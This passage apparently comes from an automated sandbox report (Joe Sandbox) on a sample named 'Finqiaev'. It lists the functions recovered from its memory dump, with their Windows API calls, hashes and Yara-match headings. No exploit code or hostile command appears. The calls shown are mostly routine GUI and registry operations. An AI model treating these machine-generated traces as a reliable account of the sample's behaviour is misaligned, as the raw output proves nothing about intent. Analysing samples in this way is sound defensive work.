                                                                                                                                    • Part of subcall function 040B5DDC: RegQueryValueExA.ADVAPI32(?,040B6048,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,040B5EE1,?,80000001), ref: 040B5EB9
                                                                                                                                    • Part of subcall function 040B5DDC: RegCloseKey.ADVAPI32(?,040B5EE8,00000000,00000000,00000005,00000000,040B5EE1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 040B5EDB
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Open$FileModuleNameQueryValue$Close
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2796650324-0
                                                                                                                                  • Opcode ID: 9711488165f6f9e55e6370d5228eb4c6dcd107eca0bc8f5d3348138f1f8277e7
                                                                                                                                  • Instruction ID: f458e2cd4a7a8125e58b17774bef88f22a01b7641f612dc1ec2daefe68b118bf
                                                                                                                                  • Opcode Fuzzy Hash: 9711488165f6f9e55e6370d5228eb4c6dcd107eca0bc8f5d3348138f1f8277e7
                                                                                                                                  • Instruction Fuzzy Hash: 0EE0ED72A01214DFDF50DE58C9C4AC637E8AB08658F0446A1AD98DF386D3B1EE608BD5
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FreeString
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3341692771-0
                                                                                                                                  • Opcode ID: baa1517bdadcfa67c0915616b3a2d67137bee1b5e396a356b24dbef79078f2ff
                                                                                                                                  • Instruction ID: 3fc61638885f7cd57f71e67a2f15c00c19abc85cefa025ce68395bbc6813798a
                                                                                                                                  • Opcode Fuzzy Hash: baa1517bdadcfa67c0915616b3a2d67137bee1b5e396a356b24dbef79078f2ff
                                                                                                                                  • Instruction Fuzzy Hash: B5E086B41002025DEE545A188850AF632B99BD1340F5A855C6481BF191DB34B901E6EC
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000000,?,040D02E0,?,?,00000000,040D048C,00000000,00000000,00000000,00000000,00000001,?,00000000,00000000), ref: 040D028E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Close
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3535843008-0
                                                                                                                                  • Opcode ID: eb308aadd2150d80a81e6751e0f9366a3a2839943b2371eba3ae4dd0f782da46
                                                                                                                                  • Instruction ID: 7743a0dbbd6b6e90b42ab6db2f3766210ef3904d5c76c8752d40d6d64ef62484
                                                                                                                                  • Opcode Fuzzy Hash: eb308aadd2150d80a81e6751e0f9366a3a2839943b2371eba3ae4dd0f782da46
                                                                                                                                  • Instruction Fuzzy Hash: DED017B17113008AEF90EF7588C4B967BDC6F08208F48C8A1D84CEF206DA29E4148F64
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetFileAttributesA.KERNEL32(00000000,?,0411062B,ScanString,041469E4,04117AE0,OpenSession,041469E4,04117AE0,OpenSession,041469E4,04117AE0,ScanBuffer,041469E4,04117AE0,ScanString), ref: 040B8E0F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AttributesFile
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3188754299-0
                                                                                                                                  • Opcode ID: f573ade78a336dd4723e6fd7a98d565a78c6aeba897005d26862891ebc9d14c6
                                                                                                                                  • Instruction ID: 4648cd23a0e28598eef59c31b674eb3136c9bd942464d9ba1a9ee4bcb02b01a3
                                                                                                                                  • Opcode Fuzzy Hash: f573ade78a336dd4723e6fd7a98d565a78c6aeba897005d26862891ebc9d14c6
                                                                                                                                  • Instruction Fuzzy Hash: 91C08CA23112000A2ED0B9FC0DC48DA02CC4A0413D3202F22F4F9F32F3D323B0A32098
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FreeString
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3341692771-0
                                                                                                                                  • Opcode ID: f9cf8d993bf6b984c3a206198d86c8bdb50b9fa8060aaea77c6d17370c297a51
                                                                                                                                  • Instruction ID: fa35e770d7feed8b227c734e2da3df285f8f3704bdce4a57e00902ba18440060
                                                                                                                                  • Opcode Fuzzy Hash: f9cf8d993bf6b984c3a206198d86c8bdb50b9fa8060aaea77c6d17370c297a51
                                                                                                                                  • Instruction Fuzzy Hash: BAC012B16512214BFF719A989CC0BD563DC9B05295F5400A1E444FB341E260F91053D4
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FreeString
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3341692771-0
                                                                                                                                  • Opcode ID: 478ca0e79f943246b1b3029f9eea381ecbc249769f11debf24d3064ab636df96
                                                                                                                                  • Instruction ID: 93d5e949515a8db780f7eae947cbc6af170a70424d50cd471be6926f510b221f
                                                                                                                                  • Opcode Fuzzy Hash: 478ca0e79f943246b1b3029f9eea381ecbc249769f11debf24d3064ab636df96
                                                                                                                                  • Instruction Fuzzy Hash: DAC0807C1053035DBF042F704914AFE23BC9D81244B85005CD881F9141D534F472B4AD
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004), ref: 040B167E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                  • Opcode ID: a9709931aea05d5966e5d6d0b097d8b07f26ba9ce0cf299c026baaf52ac2ab72
                                                                                                                                  • Instruction ID: 9b098a81e8b96e11a9259732c269011757280b5842c714ee7505b97e872665b1
                                                                                                                                  • Opcode Fuzzy Hash: a9709931aea05d5966e5d6d0b097d8b07f26ba9ce0cf299c026baaf52ac2ab72
                                                                                                                                  • Instruction Fuzzy Hash: BDF037F47013004BEB06DF7A99583426AD2E78928AF548139D619EB3C8E77998458B44
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004), ref: 040B1740
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                  • Opcode ID: e0bfdca57ed0deed513808a064e3fca86028c775d45bb0c0bda36d2f6c19c22d
                                                                                                                                  • Instruction ID: 0b7a392f69351f5e8d421dbb4ebd20ddf13a23fcdb2630290a68be4cf82a8393
                                                                                                                                  • Opcode Fuzzy Hash: e0bfdca57ed0deed513808a064e3fca86028c775d45bb0c0bda36d2f6c19c22d
                                                                                                                                  • Instruction Fuzzy Hash: 54F090F6A007556BE3118E6A9C80B83BB94FB80799F050139EA48AB344D775AC408BD4
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 040B17A0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FreeVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1263568516-0
                                                                                                                                  • Opcode ID: 94364fdfbca073c1b0e0f95dcec971c8997ecdc4e91789f859ffd66c719bdc42
                                                                                                                                  • Instruction ID: 7e446f86f871bf02c446d700c667c8194daaed7347bd2c069f3f0826abffd78c
                                                                                                                                  • Opcode Fuzzy Hash: 94364fdfbca073c1b0e0f95dcec971c8997ecdc4e91789f859ffd66c719bdc42
                                                                                                                                  • Instruction Fuzzy Hash: 2FE04F753103016EE7101E7E5C50B976AE8EB496A5F244665F691EF2D1D264F80087A4
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: RegisterAutomation$vcltest3.dll
                                                                                                                                  • API String ID: 0-2963190186
                                                                                                                                  • Opcode ID: 2b906a07f816678fe0d545de7196e083eba271277ab4a0cd57c010302efec984
                                                                                                                                  • Instruction ID: 60763482d7217bf46673698e77505611cdeb1702f1b989dfdbf1d6caa2f410a4
                                                                                                                                  • Opcode Fuzzy Hash: 2b906a07f816678fe0d545de7196e083eba271277ab4a0cd57c010302efec984
                                                                                                                                  • Instruction Fuzzy Hash: F7E13A35A40208EFEB24DB68C5C4A9DB7B1AF48314F15C2E6E865AB2D5D7B0FE40DB50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: b14762d5f4b3fe996c981923a00535b0ee540827f9b34f81d319dd3f6c72829c
                                                                                                                                  • Instruction ID: 61e776f964c4c7087ff221aa428337562fe121add5cd7278272dc40b3688501a
                                                                                                                                  • Opcode Fuzzy Hash: b14762d5f4b3fe996c981923a00535b0ee540827f9b34f81d319dd3f6c72829c
                                                                                                                                  • Instruction Fuzzy Hash: E5023A35A04244EFEB50DFA8D9C4B9D77F5AF48348F1640A0EA44AB2A2D775BE81DB40
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • IsIconic.USER32(?), ref: 040F225B
                                                                                                                                  • GetWindowPlacement.USER32(?,0000002C), ref: 040F2278
                                                                                                                                  • GetWindowRect.USER32(?), ref: 040F2291
                                                                                                                                  • GetWindowLongA.USER32(?,000000F0), ref: 040F229F
                                                                                                                                  • GetWindowLongA.USER32(?,000000F8), ref: 040F22B4
                                                                                                                                  • ScreenToClient.USER32(00000000), ref: 040F22C1
                                                                                                                                  • ScreenToClient.USER32(00000000,?), ref: 040F22CC
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$ClientLongScreen$IconicPlacementRect
                                                                                                                                  • String ID: ,
                                                                                                                                  • API String ID: 2266315723-3772416878
                                                                                                                                  • Opcode ID: 11bc10056f08039989a3272d8451c8fa8ef77ab95f4f623aa4a2d6adde776a4c
                                                                                                                                  • Instruction ID: bfa9076b0eddad8e38f3d054f3667e6b89592b236e0006167bd0a5b665dff504
                                                                                                                                  • Opcode Fuzzy Hash: 11bc10056f08039989a3272d8451c8fa8ef77ab95f4f623aa4a2d6adde776a4c
                                                                                                                                  • Instruction Fuzzy Hash: 18112E71504701AFDB50DFACC984ACB77D8AF89218F044A69FE98EB345D735E8048BA2
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: RestoreSave$FocusWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1553564791-0
                                                                                                                                  • Opcode ID: c572c5ad271f81c8b5cd1bac0c7b2dcdc7eef828c7c36d92de9e4ebab25e92fa
                                                                                                                                  • Instruction ID: 4812c757c09f1c5293bf2950d7a37e8f79df1c976e053a91ca8f4338e4cb7c96
                                                                                                                                  • Opcode Fuzzy Hash: c572c5ad271f81c8b5cd1bac0c7b2dcdc7eef828c7c36d92de9e4ebab25e92fa
                                                                                                                                  • Instruction Fuzzy Hash: 59C15A31A082099FEB55DF68C88AABEB3F5FB44708F1544B5E944BBA50DB34BE40DB50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetWindowDC.USER32(?,00000000,040E4334), ref: 040E41BE
                                                                                                                                  • SaveDC.GDI32(?), ref: 040E41F5
                                                                                                                                  • RestoreDC.GDI32(?,?), ref: 040E4262
                                                                                                                                  • NtdllDefWindowProc_A.NTDLL(?,?,?,?,00000000,040E4334), ref: 040E4316
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$NtdllProc_RestoreSave
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1045853612-0
                                                                                                                                  • Opcode ID: 8f19634dc61cb484c8b6b845172d7be93995e4b73c5feff1c5c47d2ad564f26e
                                                                                                                                  • Instruction ID: d64184311a049ecfded070fafa80c44c8366c99a386278c83005ac07f35337b7
                                                                                                                                  • Opcode Fuzzy Hash: 8f19634dc61cb484c8b6b845172d7be93995e4b73c5feff1c5c47d2ad564f26e
                                                                                                                                  • Instruction Fuzzy Hash: 80E12434A0460ADFDB10EFAAC8809AEB7F5EF88308B1586A5E941B7361D634FD51DB50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryA.KERNEL32(uxtheme.dll,00000000,040DBAF7), ref: 040DB77A
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 040DB792
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 040DB7A4
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 040DB7B6
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 040DB7C8
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 040DB7DA
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 040DB7EC
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 040DB7FE
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 040DB810
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 040DB822
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 040DB834
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 040DB846
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 040DB858
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 040DB86A
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 040DB87C
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 040DB88E
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 040DB8A0
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 040DB8B2
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 040DB8C4
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 040DB8D6
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 040DB8E8
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 040DB8FA
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 040DB90C
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 040DB91E
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 040DB930
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 040DB942
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 040DB954
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 040DB966
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 040DB978
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 040DB98A
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 040DB99C
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 040DB9AE
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 040DB9C0
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 040DB9D2
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 040DB9E4
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 040DB9F6
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 040DBA08
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 040DBA1A
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 040DBA2C
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 040DBA3E
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 040DBA50
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 040DBA62
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 040DBA74
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 040DBA86
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 040DBA98
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 040DBAAA
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 040DBABC
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 040DBACE
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc$LibraryLoad
                                                                                                                                  • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
                                                                                                                                  • API String ID: 2238633743-2910565190
                                                                                                                                  • Opcode ID: 9195e1ffab7569d5e7964eb7cf23c8ba0bad8700f6f9fdf4448e8d60992155ad
                                                                                                                                  • Instruction ID: c68b80f263d191764404eebfc0dcbf1733ded675b279450e505a9e9e3eec9c15
                                                                                                                                  • Opcode Fuzzy Hash: 9195e1ffab7569d5e7964eb7cf23c8ba0bad8700f6f9fdf4448e8d60992155ad
                                                                                                                                  • Instruction Fuzzy Hash: 8CA144B5A80740AFEF00EFA5D8D2EA537B8EF457483020964B415EF204DA78BC88CF56
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • SetErrorMode.KERNEL32(00008000), ref: 040F7041
                                                                                                                                  • GetModuleHandleA.KERNEL32(USER32,00000000,040F718E,?,00008000), ref: 040F7065
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 040F7072
                                                                                                                                  • LoadLibraryA.KERNEL32(imm32.dll,00000000,040F718E,?,00008000), ref: 040F708E
                                                                                                                                  • GetProcAddress.KERNEL32(0411B54C,ImmGetContext), ref: 040F70B0
                                                                                                                                  • GetProcAddress.KERNEL32(0411B54C,ImmReleaseContext), ref: 040F70C5
                                                                                                                                  • GetProcAddress.KERNEL32(0411B54C,ImmGetConversionStatus), ref: 040F70DA
                                                                                                                                  • GetProcAddress.KERNEL32(0411B54C,ImmSetConversionStatus), ref: 040F70EF
                                                                                                                                  • GetProcAddress.KERNEL32(0411B54C,ImmSetOpenStatus), ref: 040F7104
                                                                                                                                  • GetProcAddress.KERNEL32(0411B54C,ImmSetCompositionWindow), ref: 040F7119
                                                                                                                                  • GetProcAddress.KERNEL32(0411B54C,ImmSetCompositionFontA), ref: 040F712E
                                                                                                                                  • GetProcAddress.KERNEL32(0411B54C,ImmGetCompositionStringA), ref: 040F7143
                                                                                                                                  • GetProcAddress.KERNEL32(0411B54C,ImmIsIME), ref: 040F7158
                                                                                                                                  • GetProcAddress.KERNEL32(0411B54C,ImmNotifyIME), ref: 040F716D
                                                                                                                                  • SetErrorMode.KERNEL32(?,040F7195,00008000), ref: 040F7188
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc$ErrorMode$HandleLibraryLoadModule
                                                                                                                                  • String ID: ImmGetCompositionStringA$ImmGetContext$ImmGetConversionStatus$ImmIsIME$ImmNotifyIME$ImmReleaseContext$ImmSetCompositionFontA$ImmSetCompositionWindow$ImmSetConversionStatus$ImmSetOpenStatus$USER32$WINNLSEnableIME$imm32.dll
                                                                                                                                  • API String ID: 3397921170-3950384806
                                                                                                                                  • Opcode ID: 9620ba92515a5410f79f4759aea68ec4a2627a1d60aab93c186f7f1fc7f29d09
                                                                                                                                  • Instruction ID: 75c4272775f763946c9250395cc7bdde7f3da7146ae30b92c34e71d2790c1a42
                                                                                                                                  • Opcode Fuzzy Hash: 9620ba92515a5410f79f4759aea68ec4a2627a1d60aab93c186f7f1fc7f29d09
                                                                                                                                  • Instruction Fuzzy Hash: D53170B6684340AFEB54DFB6AC85EA537F8E784308B014820F605AB610D67E7CC4CF56
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • CreateCompatibleBitmap.GDI32(?,00000001,00000001), ref: 040D36F3
                                                                                                                                  • SelectObject.GDI32(?,?), ref: 040D3708
                                                                                                                                  • SelectObject.GDI32(?,?), ref: 040D3766
                                                                                                                                  • DeleteObject.GDI32(?), ref: 040D3772
                                                                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 040D3786
                                                                                                                                  • CreateCompatibleBitmap.GDI32(?,?,?), ref: 040D37A7
                                                                                                                                  • SelectObject.GDI32(?,?), ref: 040D37BC
                                                                                                                                  • SelectPalette.GDI32(?,?,00000000), ref: 040D37E2
                                                                                                                                  • SelectPalette.GDI32(?,00000000,000000FF), ref: 040D37F7
                                                                                                                                  • SelectPalette.GDI32(?,0414A36C,000000FF), ref: 040D380D
                                                                                                                                  • RealizePalette.GDI32(?), ref: 040D3819
                                                                                                                                  • StretchBlt.GDI32(?,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 040D383B
                                                                                                                                  • StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,?,?,?,?,00440328), ref: 040D385D
                                                                                                                                  • SetTextColor.GDI32(?,00000000), ref: 040D3865
                                                                                                                                  • SetBkColor.GDI32(?,00FFFFFF), ref: 040D3873
                                                                                                                                  • StretchBlt.GDI32(?,?,?,?,?,?,?,?,?,?,008800C6), ref: 040D389F
                                                                                                                                  • StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,00660046), ref: 040D38C4
                                                                                                                                  • SetTextColor.GDI32(?,?), ref: 040D38CE
                                                                                                                                  • SetBkColor.GDI32(?,?), ref: 040D38D8
                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 040D38EB
                                                                                                                                  • DeleteObject.GDI32(?), ref: 040D38F4
                                                                                                                                  • SelectPalette.GDI32(?,00000000,00000000), ref: 040D3916
                                                                                                                                  • DeleteDC.GDI32(?), ref: 040D391F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
